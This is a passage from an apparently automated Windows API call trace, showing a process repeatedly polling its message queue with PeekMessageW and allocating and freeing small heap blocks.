wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.081] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e280 | out: hHeap=0x12c0000) returned 1 [0135.081] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.081] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0135.081] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.081] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0135.081] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0135.081] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.082] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0135.082] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e100 [0135.082] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.082] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.082] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b5fa8 [0135.082] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.082] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b5fa8 | out: hHeap=0x12c0000) returned 1 [0135.082] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.082] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff690 [0135.082] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b5fa8 [0135.082] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0135.082] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0135.082] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0135.082] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0135.082] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b5fa8 | out: hHeap=0x12c0000) returned 1 [0135.082] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.082] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.082] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.178] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.178] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.178] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.178] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.178] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.178] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.178] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.178] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.178] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.178] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.178] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.178] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.178] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.179] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.179] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.181] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.181] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.181] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.181] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.181] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.181] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.181] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.181] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.181] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.181] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.181] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.181] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.181] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.181] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.181] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.181] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.181] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.183] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.183] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.183] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.183] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.183] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.183] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.184] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.184] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.184] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.184] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.184] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.184] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.184] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.184] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.184] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.184] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.184] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.186] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.186] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.186] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.186] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.186] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.186] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.186] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.186] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.186] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.186] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.186] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.186] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.186] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.186] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.186] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.187] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.188] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.188] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.188] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.188] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.188] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.189] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.189] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.189] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.189] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.189] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.189] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.230] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.230] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.230] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.230] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.230] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.230] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.244] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.244] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.244] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.244] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.244] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.244] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.244] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.244] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.244] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.244] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.244] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.244] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.245] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.245] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.245] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.245] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.245] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.245] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.245] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.245] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.245] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.245] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.245] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.245] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.245] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.245] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.245] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.245] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.245] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.246] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.246] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.246] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.246] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.246] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.246] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.246] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.246] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.246] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.246] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.246] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.246] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.246] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.247] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.247] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.764] TranslateMessage (lpMsg=0x7dfb8c) returned 